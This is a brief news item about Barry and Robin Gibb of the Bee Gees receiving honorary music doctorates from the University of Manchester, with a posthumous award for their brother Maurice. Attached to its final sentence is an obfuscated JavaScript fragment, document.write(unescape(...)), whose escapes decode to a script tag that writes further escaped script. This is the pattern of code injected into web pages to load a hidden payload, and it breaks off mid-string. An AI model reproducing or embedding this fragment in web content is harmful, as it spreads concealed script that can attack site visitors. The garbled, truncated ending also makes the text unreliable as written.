Barry Gibb of The Bee Gees says getting an honorary music doctorate was "completely overwhelming and wonderful."
Gibb and his brother Robin were given the doctorates yesterday from the University of Manchester. They also accepted a posthumous doctorate for their brother Maurice, who died last year.
Gibb says Maurice was applauding as well and he's looking down on them, wishing he could be there.
Gibb says he and Robin are opening a recording studio at a school in Manchester in Maurice's honor. The Gibbs lived in Manchester in the 1950s. Gibb says they started there and they've "come back full circle via the long way."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
